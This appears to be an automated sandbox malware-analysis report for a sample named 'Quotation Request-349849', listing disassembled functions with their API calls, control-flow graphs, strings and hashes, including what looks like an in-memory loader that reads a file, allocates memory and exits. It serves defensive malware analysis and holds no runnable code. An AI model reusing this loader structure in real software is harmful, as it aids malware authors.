                                                      Function 007DE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00813E62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: db6b715018890b641e7aac7130b4b419c2c4c5e497a554957da2e890dedf998b
                                                      • Instruction ID: 92e6b58c86480b8e85b087bbf6106f2c961cdc660eeb264b2ab36f86f8bd62a8
                                                      • Opcode Fuzzy Hash: db6b715018890b641e7aac7130b4b419c2c4c5e497a554957da2e890dedf998b
                                                      • Instruction Fuzzy Hash: EAA29075A00209CFCB15EF58C480AADB7B6FF58314F68805AE906AF351D779ED82CB91
                                                      Function 007E09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0A5B
                                                      • timeGetTime.WINMM ref: 007E0D16
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0E53
                                                      • Sleep.KERNEL32(0000000A), ref: 007E0E61
                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 007E0EFA
                                                      • DestroyWindow.USER32 ref: 007E0F06
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007E0F20
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00814E83
                                                      • TranslateMessage.USER32(?), ref: 00815C60
                                                      • DispatchMessageW.USER32(?), ref: 00815C6E
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00815C82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 4212290369-3242690629
                                                      • Opcode ID: 1923863324745a5f95a5d236ea47fd2d99833203c0c41b7152e98d3ed7e79b2c
                                                      • Instruction ID: 466eb7bedb9c4b260d77c67f9ec8e80511409b4ceac9366242a73c56065a0f88
                                                      • Opcode Fuzzy Hash: 1923863324745a5f95a5d236ea47fd2d99833203c0c41b7152e98d3ed7e79b2c
                                                      • Instruction Fuzzy Hash: 3EB2B270609781DFD724DF24C884BAAB7E9FF84304F14491EE599D72A1DB78E884CB92
                                                      Function 00839155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00838F5F: __time64.LIBCMT ref: 00838F69
                                                        • Part of subcall function 007D4EE5: _fseek.LIBCMT ref: 007D4EFD
                                                      • __wsplitpath.LIBCMT ref: 00839234
                                                        • Part of subcall function 007F40FB: __wsplitpath_helper.LIBCMT ref: 007F413B
                                                      • _wcscpy.LIBCMT ref: 00839247
                                                      • _wcscat.LIBCMT ref: 0083925A
                                                      • __wsplitpath.LIBCMT ref: 0083927F
                                                      • _wcscat.LIBCMT ref: 00839295
                                                      • _wcscat.LIBCMT ref: 008392A8
                                                        • Part of subcall function 00838FA5: _memmove.LIBCMT ref: 00838FDE
                                                        • Part of subcall function 00838FA5: _memmove.LIBCMT ref: 00838FED
                                                      • _wcscmp.LIBCMT ref: 008391EF
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839824
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839837
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00839452
                                                      • _wcsncpy.LIBCMT ref: 008394C5
                                                      • DeleteFileW.KERNEL32(?,?), ref: 008394FB
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00839511
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00839522
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00839534
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: 808d8231f15e521412b1828c139b18247055b423e76230aec229ada7a29209ff
                                                      • Instruction ID: 440a44be1bf92e077a298657676db57d682f6ac0bda022f8ff4a0614a33c95c1
                                                      • Opcode Fuzzy Hash: 808d8231f15e521412b1828c139b18247055b423e76230aec229ada7a29209ff
                                                      • Instruction Fuzzy Hash: 46C12BB1D0021DABDF21DF95CC85AEEB7B9FF85310F0040A6F609E6251DB749A848FA5
                                                      Function 007D3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 007D3074
                                                      • RegisterClassExW.USER32(00000030), ref: 007D309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D30AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 007D30CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D30DC
                                                      • LoadIconW.USER32(000000A9), ref: 007D30F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 54943ba9fa86c84e4ac161e1b30f82ee503d292ba6e52dea8b836f33b7ccc238
                                                      • Instruction ID: af1198dc83f4f53ac5c6070f80c69e1a20d2c9aa8fcbdfa9cab8d91c8e787f96
                                                      • Opcode Fuzzy Hash: 54943ba9fa86c84e4ac161e1b30f82ee503d292ba6e52dea8b836f33b7ccc238
                                                      • Instruction Fuzzy Hash: 19310871805749AFDB029FA4EC89B9ABFF0FB09311F18416AE690EA2A1D3B90545CF51
                                                      Function 007D3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 007D3074
                                                      • RegisterClassExW.USER32(00000030), ref: 007D309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D30AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 007D30CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D30DC
                                                      • LoadIconW.USER32(000000A9), ref: 007D30F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 63be0cf846c53a0db4ea659cdf1bdac0e15e3178513e1dc85ba3046d340626c9
                                                      • Instruction ID: 2cbfb19dc4eb925e0c9600b161ef5a022fda9144aa535d07e18cb7d63317d4d7
                                                      • Opcode Fuzzy Hash: 63be0cf846c53a0db4ea659cdf1bdac0e15e3178513e1dc85ba3046d340626c9
                                                      • Instruction Fuzzy Hash: 3F21C3B1911718AFDB01EFA4E889BDEBBF4FB08711F04412AFA11A62A1D7B54544CF91
                                                      Function 007D708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 007D4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008952F8,?,007D37AE,?), ref: 007D4724
                                                        • Part of subcall function 007F050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007D7165), ref: 007F052D
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D71A8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0080E8C8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0080E909
                                                      • RegCloseKey.ADVAPI32(?), ref: 0080E947
                                                      • _wcscat.LIBCMT ref: 0080E9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 28cd1cb1ddc39242ca5b997161db430fa32ec16969d5eb892ba4f9202670f0c1
                                                      • Instruction ID: 512b4e0124eab855b5c429451545784110c8d81b2ebe2c83a3f1c7dc7b31b349
                                                      • Opcode Fuzzy Hash: 28cd1cb1ddc39242ca5b997161db430fa32ec16969d5eb892ba4f9202670f0c1
                                                      • Instruction Fuzzy Hash: 9A717A71508301DEC304EFA9EC459ABBBB8FF84350B48092FF545C72A1EB759948CB92
                                                      Function 007D3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 007D3A50
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 007D3A5F
                                                      • LoadIconW.USER32(00000063), ref: 007D3A76
                                                      • LoadIconW.USER32(000000A4), ref: 007D3A88
                                                      • LoadIconW.USER32(000000A2), ref: 007D3A9A
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AC0
                                                      • RegisterClassExW.USER32(?), ref: 007D3B16
                                                        • Part of subcall function 007D3041: GetSysColorBrush.USER32(0000000F), ref: 007D3074
                                                        • Part of subcall function 007D3041: RegisterClassExW.USER32(00000030), ref: 007D309E
                                                        • Part of subcall function 007D3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D30AF
                                                        • Part of subcall function 007D3041: InitCommonControlsEx.COMCTL32(?), ref: 007D30CC
                                                        • Part of subcall function 007D3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D30DC
                                                        • Part of subcall function 007D3041: LoadIconW.USER32(000000A9), ref: 007D30F2
                                                        • Part of subcall function 007D3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: c1a64b1fa2a85bf891ea337c5b049300c7afa49cd88b0408323ce27ecb800e87
                                                      • Instruction ID: 657f5185e5b6d81cd0d977b5a95da35e950544971ace293d8515b50468c53809
                                                      • Opcode Fuzzy Hash: c1a64b1fa2a85bf891ea337c5b049300c7afa49cd88b0408323ce27ecb800e87
                                                      • Instruction Fuzzy Hash: A7212B71D00304AFEB12EFE4EC59B9D7BB5FB08711F14416BF604A62A1D3B956508F94
                                                      Function 007D3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 767 7d3633-7d3681 769 7d36e1-7d36e3 767->769 770 7d3683-7d3686 767->770 769->770 773 7d36e5 769->773 771 7d3688-7d368f 770->771 772 7d36e7 770->772 774 7d374b-7d3753 PostQuitMessage 771->774 775 7d3695-7d369a 771->775 777 7d36ed-7d36f0 772->777 778 80d0cc-80d0fa call 7e1070 call 7e1093 772->778 776 7d36ca-7d36d2 DefWindowProcW 773->776 784 7d3711-7d3713 774->784 782 80d154-80d168 call 832527 775->782 783 7d36a0-7d36a2 775->783 785 7d36d8-7d36de 776->785 779 7d3715-7d373c SetTimer RegisterWindowMessageW 777->779 780 7d36f2-7d36f3 777->780 813 80d0ff-80d106 778->813 779->784 789 7d373e-7d3749 CreatePopupMenu 779->789 786 7d36f9-7d370c KillTimer call 7d443a call 7d3114 780->786 787 80d06f-80d072 780->787 782->784 806 80d16e 782->806 790 7d36a8-7d36ad 783->790 791 7d3755-7d375f call 7d44a0 783->791 784->785 786->784 799 80d074-80d076 787->799 800 80d0a8-80d0c7 MoveWindow 787->800 789->784 795 80d139-80d140 790->795 796 7d36b3-7d36b8 790->796 807 7d3764 791->807 795->776 802 80d146-80d14f call 827c36 795->802 804 7d36be-7d36c4 796->804 805 80d124-80d134 call 832d36 796->805 808 80d097-80d0a3 SetFocus 799->808 809 80d078-80d07b 799->809 800->784 802->776 804->776 804->813 805->784 806->776 807->784 808->784 809->804 814 80d081-80d092 call 7e1070 809->814 813->776 818 80d10c-80d11f call 7d443a call 7d434a 813->818 814->784 818->776
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 007D36D2
                                                      • KillTimer.USER32(?,00000001), ref: 007D36FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D371F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D372A
                                                      • CreatePopupMenu.USER32 ref: 007D373E
                                                      • PostQuitMessage.USER32(00000000), ref: 007D374D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: a1677c8cadc12d4f07c4e793a88b89879de62b21404814aeea29b2906a56cda3
                                                      • Instruction ID: a693d97c0998d44b745118e933f1cd9e6940ab0044dde10a76426e524792f128
                                                      • Opcode Fuzzy Hash: a1677c8cadc12d4f07c4e793a88b89879de62b21404814aeea29b2906a56cda3
                                                      • Instruction Fuzzy Hash: 2841F4B2200A45FBDB117FA8DC49B7A3B78FB04311F180127F602D63E2DA6D9A549763
                                                      Function 007D3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                      • API String ID: 1825951767-3513169116
                                                      • Opcode ID: 2c0504a359f4738913a3dfe87b3be8e2dcb39539c52446f9fb55ea856b6ebd75
                                                      • Instruction ID: 9aaa5bab50b41af6ac2b43c8119f7859cdb0dff06e09eeb0df4d1c032acd65ee
                                                      • Opcode Fuzzy Hash: 2c0504a359f4738913a3dfe87b3be8e2dcb39539c52446f9fb55ea856b6ebd75
                                                      • Instruction Fuzzy Hash: 1BA13D7191021DDACF05EBE4DC99AEEB779FF14310F48042AE515B7291EF786A08CB61
                                                      Function 015EB878 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 942 15eb878-15eb926 call 15e9298 945 15eb92d-15eb953 call 15ec788 CreateFileW 942->945 948 15eb95a-15eb96a 945->948 949 15eb955 945->949 954 15eb96c 948->954 955 15eb971-15eb98b VirtualAlloc 948->955 950 15ebaa5-15ebaa9 949->950 952 15ebaeb-15ebaee 950->952 953 15ebaab-15ebaaf 950->953 956 15ebaf1-15ebaf8 952->956 957 15ebabb-15ebabf 953->957 958 15ebab1-15ebab4 953->958 954->950 961 15eb98d 955->961 962 15eb992-15eb9a9 ReadFile 955->962 963 15ebb4d-15ebb62 956->963 964 15ebafa-15ebb05 956->964 959 15ebacf-15ebad3 957->959 960 15ebac1-15ebacb 957->960 958->957 967 15ebad5-15ebadf 959->967 968 15ebae3 959->968 960->959 961->950 969 15eb9ab 962->969 970 15eb9b0-15eb9f0 VirtualAlloc 962->970 965 15ebb64-15ebb6f VirtualFree 963->965 966 15ebb72-15ebb7a 963->966 971 15ebb09-15ebb15 964->971 972 15ebb07 964->972 965->966 967->968 968->952 969->950 973 15eb9f7-15eba12 call 15ec9d8 970->973 974 15eb9f2 970->974 975 15ebb29-15ebb35 971->975 976 15ebb17-15ebb27 971->976 972->963 982 15eba1d-15eba27 973->982 974->950 979 15ebb37-15ebb40 975->979 980 15ebb42-15ebb48 975->980 978 15ebb4b 976->978 978->956 979->978 980->978 983 15eba5a-15eba6e call 15ec7e8 982->983 984 15eba29-15eba58 call 15ec9d8 982->984 990 15eba72-15eba76 983->990 991 15eba70 983->991 984->982 992 15eba78-15eba7c CloseHandle 990->992 993 15eba82-15eba86 990->993 991->950 992->993 994 15eba88-15eba93 VirtualFree 993->994 995 15eba96-15eba9f 993->995 994->995 995->945 995->950
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015EB949
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015EBB6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                      • Instruction ID: 55a6f01f8a722a5526df72233a54a779813dfe657819c1d9d378277706b3963a
                                                      • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                      • Instruction Fuzzy Hash: 51A10974E00209EBDF18CFA4C898BEEBBB5BF48306F108559E615BB281D7759A40CB55
                                                      Function 007D39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1073 7d39d5-7d3a45 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A03
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A24
                                                      • ShowWindow.USER32(00000000,?,?), ref: 007D3A38
                                                      • ShowWindow.USER32(00000000,?,?), ref: 007D3A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 561c061b80a5ba0672228fb203e3c96bfdc152120c2a6e39e2d943fd2193f710
                                                      • Instruction ID: 9b37ce0ea63418d7b0576f689d4b0cbd1eb72b529a926bcb36bbbc5b442ddb84
                                                      • Opcode Fuzzy Hash: 561c061b80a5ba0672228fb203e3c96bfdc152120c2a6e39e2d943fd2193f710
                                                      • Instruction Fuzzy Hash: F1F03A705006907EEA3267A36C08E2B3E7DF7CAF51F04002ABA00A21B1C2651800CBB0
                                                      Function 015EB648 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1074 15eb648-15eb773 call 15e9298 call 15eb538 CreateFileW 1081 15eb77a-15eb78a 1074->1081 1082 15eb775 1074->1082 1085 15eb78c 1081->1085 1086 15eb791-15eb7ab VirtualAlloc 1081->1086 1083 15eb82a-15eb82f 1082->1083 1085->1083 1087 15eb7af-15eb7c6 ReadFile 1086->1087 1088 15eb7ad 1086->1088 1089 15eb7ca-15eb804 call 15eb578 call 15ea538 1087->1089 1090 15eb7c8 1087->1090 1088->1083 1095 15eb806-15eb81b call 15eb5c8 1089->1095 1096 15eb820-15eb828 ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                                      APIs
                                                        • Part of subcall function 015EB538: Sleep.KERNELBASE(000001F4), ref: 015EB549
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015EB769
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: GCAPARKFTQ5KP3FN
                                                      • API String ID: 2694422964-2222808206
                                                      • Opcode ID: 3f96f179646803efa3c72dfbbca67a9a919a1a9e35b17686cf933a8cf7304269
